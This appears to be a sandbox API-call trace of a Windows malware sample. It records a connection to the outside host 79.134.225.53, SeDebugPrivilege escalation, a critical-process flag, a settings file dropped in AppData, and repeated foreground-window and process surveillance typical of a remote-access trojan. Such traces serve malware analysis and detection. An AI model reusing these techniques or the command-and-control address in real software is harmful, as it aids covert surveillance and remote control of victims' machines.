[0173.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28aa64 | out: lpFileInformation=0x28aa64*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0173.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28a79c) returned 1
[0173.557] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3000, lpName=0x0) returned 0x318
[0173.558] memcpy (in: _Dst=0x3f0000, _Src=0x28fc158, _Size=0x3000 | out: _Dst=0x3f0000) returned 0x3f0000
[0173.558] CloseHandle (hObject=0x318) returned 1
[0174.007] GetWindowThreadProcessId (in: hWnd=0x7005c, lpdwProcessId=0x28e67c | out: lpdwProcessId=0x28e67c) returned 0x5c0
[0174.007] GetCurrentThreadId () returned 0x5c0
[0174.208] CoCreateGuid (in: pguid=0x28ed08 | out: pguid=0x28ed08*(Data1=0xd39aef25, Data2=0x5031, Data3=0x4fbe, Data4=([0]=0x84, [1]=0x31, [2]=0x16, [3]=0xe7, [4]=0xdb, [5]=0x5d, [6]=0x98, [7]=0x8b))) returned 0x0
[0174.312] CoTaskMemAlloc (cb=0x20e) returned 0x10abf80
[0174.312] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x10abf80, nSize=0x105 | out: lpBuffer="") returned 0x0
[0174.312] CoTaskMemFree (pv=0x10abf80)
[0174.312] CoTaskMemAlloc (cb=0x20e) returned 0x10abf80
[0174.312] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x10abf80, nSize=0x105 | out: lpBuffer="") returned 0x0
[0174.312] CoTaskMemFree (pv=0x10abf80)
[0175.010] EtwEventRegister () returned 0x0
[0175.435] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x28eabc | out: lpWSAData=0x28eabc) returned 0
[0175.450] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x348
[0175.953] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0175.953] closesocket (s=0x348) returned 0
[0175.954] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x348
[0176.002] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0176.002] closesocket (s=0x348) returned 0
[0176.016] GetCurrentProcess () returned 0xffffffff
[0176.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e8bc | out: TokenHandle=0x28e8bc*=0x348) returned 1
[0176.025] CloseHandle (hObject=0x348) returned 1
[0176.025] GetCurrentProcess () returned 0xffffffff
[0176.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e8d4 | out: TokenHandle=0x28e8d4*=0x348) returned 1
[0176.026] CloseHandle (hObject=0x348) returned 1
[0176.176] GetCurrentProcess () returned 0xffffffff
[0176.176] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e868 | out: TokenHandle=0x28e868*=0x348) returned 1
[0176.196] CloseHandle (hObject=0x348) returned 1
[0176.196] GetCurrentProcess () returned 0xffffffff
[0176.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e880 | out: TokenHandle=0x28e880*=0x348) returned 1
[0176.197] CloseHandle (hObject=0x348) returned 1
[0176.204] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348
[0176.254] setsockopt (s=0x348, level=65535, optname=128, optval="\x01", optlen=4) returned 0
[0176.367] bind (s=0x348, addr=0x28da8b8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
[0176.404] WSAIoctl (in: s=0x348, dwIoControlCode=0xc8000006, lpvInBuffer=0x28ec2c, cbInBuffer=0x10, lpvOutBuffer=0x28ec18, cbOutBuffer=0x4, lpcbBytesReturned=0x28ec14, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x28ec18, lpcbBytesReturned=0x28ec14, lpOverlapped=0x0) returned 0
[0176.458] ConnectEx (in: s=0x348, name=0x28da6cc*(sa_family=2, sin_port=0x1c03, sin_addr="79.134.225.53"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x28ecbc, lpOverlapped=0x28cc11c | out: lpdwBytesSent=0x28ecbc*=0x0) returned 0
[0176.462] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 0
[0176.463] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 0
[0176.463] WaitMessage () returned 1
[0179.785] PeekMessageW (lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0)
[0179.786] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1
[0179.786] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1
[0179.815] GetCurrentProcess () returned 0xffffffff
[0179.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x28e950 | out: TokenHandle=0x28e950*=0x348) returned 1
[0179.815] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28e948 | out: lpLuid=0x28e948*(LowPart=0x14, HighPart=0)) returned 1
[0179.820] AdjustTokenPrivileges (in: TokenHandle=0x348, DisableAllPrivileges=0, NewState=0x28f3680*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0179.821] CloseHandle (hObject=0x348) returned 1
[0179.830] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x1d, ProcessInformation=0x28e990, ProcessInformationLength=0x4) returned 0x0
[0179.831] GetCurrentProcess () returned 0xffffffff
[0179.831] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x28e950 | out: TokenHandle=0x28e950*=0x348) returned 1
[0179.831] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28e948 | out: lpLuid=0x28e948*(LowPart=0x14, HighPart=0)) returned 1
[0179.832] AdjustTokenPrivileges (in: TokenHandle=0x348, DisableAllPrivileges=0, NewState=0x28f3698*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0179.832] CloseHandle (hObject=0x348) returned 1
[0179.926] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e42c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0179.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e66c) returned 1
[0179.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x28e930 | out: lpFileInformation=0x28e930*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0179.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e668) returned 1
[0179.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", nBufferLength=0x105, lpBuffer=0x28e310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin", lpFilePart=0x0) returned 0x54
[0179.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e828) returned 1
[0179.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348
[0179.929] GetFileType (hFile=0x348) returned 0x1
[0179.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e824) returned 1
[0179.929] GetFileType (hFile=0x348) returned 0x1
[0179.929] WriteFile (in: hFile=0x348, lpBuffer=0x28f3c88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x28e8ac, lpOverlapped=0x0 | out: lpBuffer=0x28f3c88*, lpNumberOfBytesWritten=0x28e8ac*=0x8, lpOverlapped=0x0) returned 1
[0179.930] CloseHandle (hObject=0x348) returned 1
[0179.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", nBufferLength=0x105, lpBuffer=0x28e434, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak", lpFilePart=0x0) returned 0x54
[0179.934] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\settings.bak" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\settings.bak")) returned 0
[0179.935] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.935] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x46, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.944] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28edfc | out: lpwndpl=0x28edfc) returned 1
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.944] GetClientRect (in: hWnd=0x7005c, lpRect=0x28edac | out: lpRect=0x28edac) returned 1
[0179.944] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28edac | out: lpRect=0x28edac) returned 1
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.944] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x47, wParam=0x0, lParam=0x28f04c) returned 0x0
[0179.945] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.945] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x83, wParam=0x1, lParam=0x28ec30) returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x1c, wParam=0x1, lParam=0xc6c) returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1c, wParam=0x1, lParam=0xc6c) returned 0x0
[0179.946] NtdllDefWindowProc_W () returned 0x0
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1
[0179.946] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.947] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.947] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x6, wParam=0x1, lParam=0x0) returned 0x0
[0179.954] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0
[0179.956] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x3b, wParam=0x50c, lParam=0x0)
[0179.957] DestroyCursor (hCursor=0x502a9) returned 1
[0179.959] GetWindowLongW (hWnd=0x7005c, nIndex=-20) returned 65792
[0179.960] DestroyWindow (hWnd=0x7005c)
[0179.960] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0179.963] PostThreadMessageW (idThread=0x5c0, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0179.966] DestroyWindow (hWnd=0x501fe)
[0179.966] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0179.968] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0179.968] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc670) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x6, wParam=0x0, lParam=0x0) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1c, wParam=0x0, lParam=0xc6c) returned 0x0
[0179.969] NtdllDefWindowProc_W () returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0
[0179.969] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0179.970] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
Thread:
id = 19
os_tid = 0x860
Thread:
id = 20
os_tid = 0x50c
[0158.603] CoGetContextToken (in: pToken=0x103f72c | out: pToken=0x103f72c) returned 0x800401f0
[0158.603] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0173.933] CloseHandle (hObject=0x240) returned 1
[0173.933] RegCloseKey (hKey=0x23c) returned 0x0
[0173.934] CloseHandle (hObject=0x2b0) returned 1
[0173.935] CloseHandle (hObject=0x280) returned 1
[0173.935] RegCloseKey (hKey=0x254) returned 0x0
[0173.935] RegCloseKey (hKey=0x258) returned 0x0
Thread:
id = 21
os_tid = 0x410
Thread:
id = 30
os_tid = 0x438
Thread:
id = 31
os_tid = 0x5f8
Thread:
id = 32
os_tid = 0x4f8
Thread:
id = 39
os_tid = 0x940
[0170.990] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0170.992] CoGetContextToken (in: pToken=0x56ffb24 | out: pToken=0x56ffb24) returned 0x0
[0170.992] CObjectContext::QueryInterface () returned 0x0
[0170.992] CObjectContext::GetCurrentThreadType () returned 0x0
[0170.992] Release () returned 0x0
[0170.992] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0170.993] CoUninitialize ()
Thread:
id = 40
os_tid = 0x948
Thread:
id = 41
os_tid = 0x94c
[0171.997] CoGetContextToken (in: pToken=0x136f954 | out: pToken=0x136f954) returned 0x0
[0171.997] CObjectContext::QueryInterface () returned 0x0
[0171.997] CObjectContext::GetCurrentThreadType () returned 0x0
[0171.997] Release () returned 0x0
[0171.998] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 42
os_tid = 0x95c
[0172.097] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0172.098] CoGetContextToken (in: pToken=0x580fcb4 | out: pToken=0x580fcb4) returned 0x0
[0172.098] CObjectContext::QueryInterface () returned 0x0
[0172.098] CObjectContext::GetCurrentThreadType () returned 0x0
[0172.098] Release () returned 0x0
[0172.099] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
[0172.099] CoUninitialize ()
[0172.173] GetTimeZoneInformation (in: lpTimeZoneInformation=0x580f654 | out: lpTimeZoneInformation=0x580f654) returned 0x2
[0172.187] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x580f4b0 | out: pTimeZoneInformation=0x580f4b0) returned 0x2
[0172.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x580f594 | out: phkResult=0x580f594*=0x304) returned 0x0
[0172.190] RegQueryValueExW (in: hKey=0x304, lpValueName="TZI", lpReserved=0x0, lpType=0x580f5b0, lpData=0x0, lpcbData=0x580f5ac*=0x0 | out: lpType=0x580f5b0*=0x3, lpData=0x0, lpcbData=0x580f5ac*=0x2c) returned 0x0
[0172.191] RegQueryValueExW (in: hKey=0x304, lpValueName="TZI", lpReserved=0x0, lpType=0x580f5b0, lpData=0x28de514, lpcbData=0x580f5ac*=0x2c | out: lpType=0x580f5b0*=0x3, lpData=0x28de514*, lpcbData=0x580f5ac*=0x2c) returned 0x0
[0172.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x580f3e8 | out: phkResult=0x580f3e8*=0x0) returned 0x2
[0172.192] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x580f588, lpData=0x28dea20, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-320", lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x580f588, lpData=0x28dea78, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-322", lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x580f588, lpData=0x0, lpcbData=0x580f584*=0x0 | out: lpType=0x580f588*=0x1, lpData=0x0, lpcbData=0x580f584*=0x20) returned 0x0
[0172.193] RegQueryValueExW (in: hKey=0x304, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x580f588, lpData=0x28dead0, lpcbData=0x580f584*=0x20 | out: lpType=0x580f588*=0x1, lpData="@tzres.dll,-321", lpcbData=0x580f584*=0x20) returned 0x0
[0172.195] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.195] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.197] CoTaskMemFree (pv=0x10a67f8)
[0172.197] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.197] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.210] CoTaskMemFree (pv=0x0)
[0172.210] CoTaskMemFree (pv=0x10a67f8)
[0172.211] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.215] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.215] LoadStringW (in: hInstance=0x3f0001, uID=0x140, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c
[0172.215] CoTaskMemFree (pv=0x10a67f8)
[0172.215] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.218] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.218] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.218] CoTaskMemFree (pv=0x10a67f8)
[0172.218] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.218] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.221] CoTaskMemFree (pv=0x0)
[0172.221] CoTaskMemFree (pv=0x10a67f8)
[0172.221] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.224] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.224] LoadStringW (in: hInstance=0x3f0001, uID=0x142, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17
[0172.224] CoTaskMemFree (pv=0x10a67f8)
[0172.224] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.225] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.225] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x10a67f8 | out: pszPath="C:\\Windows\\system32") returned 0x0
[0172.225] CoTaskMemFree (pv=0x10a67f8)
[0172.225] CoTaskMemAlloc (cb=0x20c) returned 0x10a67f8
[0172.225] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath=0x10a67f8, pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c | out: pwszLanguage=0x0, pcchLanguage=0x580f5a4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x580f5a8, pululEnumerator=0x580f59c) returned 1
[0172.228] CoTaskMemFree (pv=0x0)
[0172.228] CoTaskMemFree (pv=0x10a67f8)
[0172.228] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3f0001
[0172.233] CoTaskMemAlloc (cb=0x3ec) returned 0x10a67f8
[0172.233] LoadStringW (in: hInstance=0x3f0001, uID=0x141, lpBuffer=0x10a67f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17
[0172.233] CoTaskMemFree (pv=0x10a67f8)
[0172.234] FreeLibrary (hLibModule=0x3f0001) returned 1
[0172.234] RegCloseKey (hKey=0x304) returned 0x0
[0173.002] GetForegroundWindow () returned 0x102a8
[0173.046] GetWindowThreadProcessId (in: hWnd=0x102a8, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0xc6c
[0173.058] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x580f14c | out: lpLuid=0x580f14c*(LowPart=0x14, HighPart=0)) returned 1
[0173.059] GetCurrentProcess () returned 0xffffffff
[0173.059] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x580f148 | out: TokenHandle=0x580f148*=0x318) returned 1
[0173.060] AdjustTokenPrivileges (in: TokenHandle=0x318, DisableAllPrivileges=0, NewState=0x28f26c4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0173.060] CloseHandle (hObject=0x318) returned 1
[0173.072] EnumProcesses (in: lpidProcess=0x28f2ea8, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x28f2ea8, lpcbNeeded=0x580f834) returned 1
[0173.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38c18e8, Length=0x20000, ResultLength=0x580f800 | out: SystemInformation=0x38c18e8, ResultLength=0x580f800*=0xcea0) returned 0x0
[0173.234] GetKeyboardLayout (idThread=0xc6c) returned 0x4090409
[0173.287] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.289] GetForegroundWindow () returned 0x102a8
[0173.289] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.367] GetForegroundWindow () returned 0x102a8
[0173.367] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.496] GetForegroundWindow () returned 0x102a8
[0173.496] GetWindowTextW (in: hWnd=0x102a8, lpString=0x580f5f4, nMaxCount=256 | out: lpString="Sit Situation Claim") returned 19
[0173.684] GetForegroundWindow () returned 0x10116
[0173.684] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x580f878 | out: lpdwProcessId=0x580f878) returned 0x780
[0173.730] EnumProcesses (in: lpidProcess=0x290c0bc, cb=0x400, lpcbNeeded=0x580f834 | out: lpidProcess=0x290c0bc, lpcbNeeded=0x580f834) returned 1
